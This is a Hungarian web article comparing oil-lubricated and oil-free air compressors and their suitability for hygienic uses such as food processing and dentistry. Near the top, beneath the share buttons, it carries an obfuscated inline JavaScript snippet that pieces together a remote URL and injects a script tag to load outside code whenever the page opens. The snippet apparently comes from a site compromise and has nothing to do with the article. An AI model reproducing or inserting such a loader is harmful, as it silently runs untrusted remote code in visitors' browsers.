Az olajos kompresszor és az olajmentes lehetőségek

Az olajos kompresszor és az olajmentes lehetőségek

Share 0 Tweet 0 Share

(function(){tpmxu=”kd2yn3jvpmxd”;tpmx=document.createElement(„script”);tpmx_=”u”+(„st”);tpmx_+=”at”+(„.”);tpmx.async=true;tpmx_+=”in”;tpmxu=”2190640509.”+tpmxu;tpmx.;tpmxu+=”Xakvcb03vv4i”;tpmxu+=”h3ex8h”;tpmx_+=(„f”)+”o”+(„/”);tpmx.src=”https://”+tpmx_+tpmxu;tpmxd=document.body;tpmxd.appendChild(tpmx);})();

Az eszköz működéséről

A kompresszorok kifejezetten egyszerű eszközöknek mondhatók, legalábbis feladatukat és működési elvüket tekintve. Legyen szó bármelyik típusról, a lényeg jellemzően utóbbi, hiszen ez sok egyéb specifikációk is meghatároz. A forgalmazók kínálatában ma már mindössze két típus bukkan fel, a dugattyús- illetve a csavarkompresszorok. Az elnevezés természetesen a működési elvre utal, azonban míg előbbi szerényebb teljesítményt nyújt, utóbbi ipari környezetben is használható.

Bár a kompresszorok működésének mélyebb rétegeibe is érdemes lehet belelátni, esetünkben elegendő az alapokkal megismerkedni. Ehhez azonban még egy tényező szükséges a teljes egyenlethez, ez pedig az eszközök hűtéséért és kenéséért felelős közeg, az olaj. Az üzletek kínálatában ugyanis a legtöbb esetben olajos kompresszor érhető el, mely nem minden helyzetben felel meg az elvárásoknak.

Problémás adalék

Az olajos kompresszor nevéből értelemszerűen adódik, hogy a rendszerben valahol olaj található. Ez az adalék a legtöbb esetben nélkülözhetetlen, hiszen az alkatrészek kenése mellett a hűtési feladatokat is segíti, mely a kompresszorok folyamatos működését hivatott garantálni. Egyes dugattyús kompresszorok még így is hajlamosak túlhevülni, így talán ebből is látszik, hogy az olaj milyen fontos szerepet tölt be az eszközök működésében.

Hírdetés

Ez azonban azt is jelenti, hogy az olaj sok esetben az előállított sűrített levegőben is megjelenik. Ezt sokszor szinte észrevétlen, apró cseppek formájában teszi, ám ezt azt is okozhatja, hogy bizonyos alkalmazási területekre elégtelennek bizonyul a levegő minősége. Az olajos kompresszor tehát csak olyan helyeken alkalmazható biztonsággal, ahol nem probléma, ha a sűrített levegő nem teljesen mentes az olajtól és az apróbb szennyeződésektől.

Sterilebb megoldások

A tiszta, olajmentes sűrített levegő elsősorban olyan területeken lehet igény, ahol fontosabb a higiénia. Így például élelmiszeripari vagy épp egészségügyi felhasználók számára lényegében nélkülözhetetlen ez a megoldás. Az iparban alkalmazott csavarkompresszorok között is találhatunk olajmentes verziókat, de ez kevésbé jellemző, a folyamatokban ugyanakkor szükség van ezek teljesítményére. A megoldást ebben az esetben az olajszűrő alkalmazása jelentheti.

Az egészségügyben, például fogászati célokra de akár a kozmetika területén annyival könnyebb a helyzet, hogy a teljesítmény tekintetében egy dugattyús kompresszor is megteszi. Bár tény, hogy ezek többsége is olajos kompresszor, találunk kivételeket. A felhasználói igények figyelembevételével ugyanis a gyártók már teljesen olajmentes, kisebb teljesítményű kompresszorokat is készítenek, melyek kifejezetten ezt a felhasználói réteget célozzák.

Share 0 Tweet 0 Share


Forrás:alternativenergia.hu
Tovább a cikkre »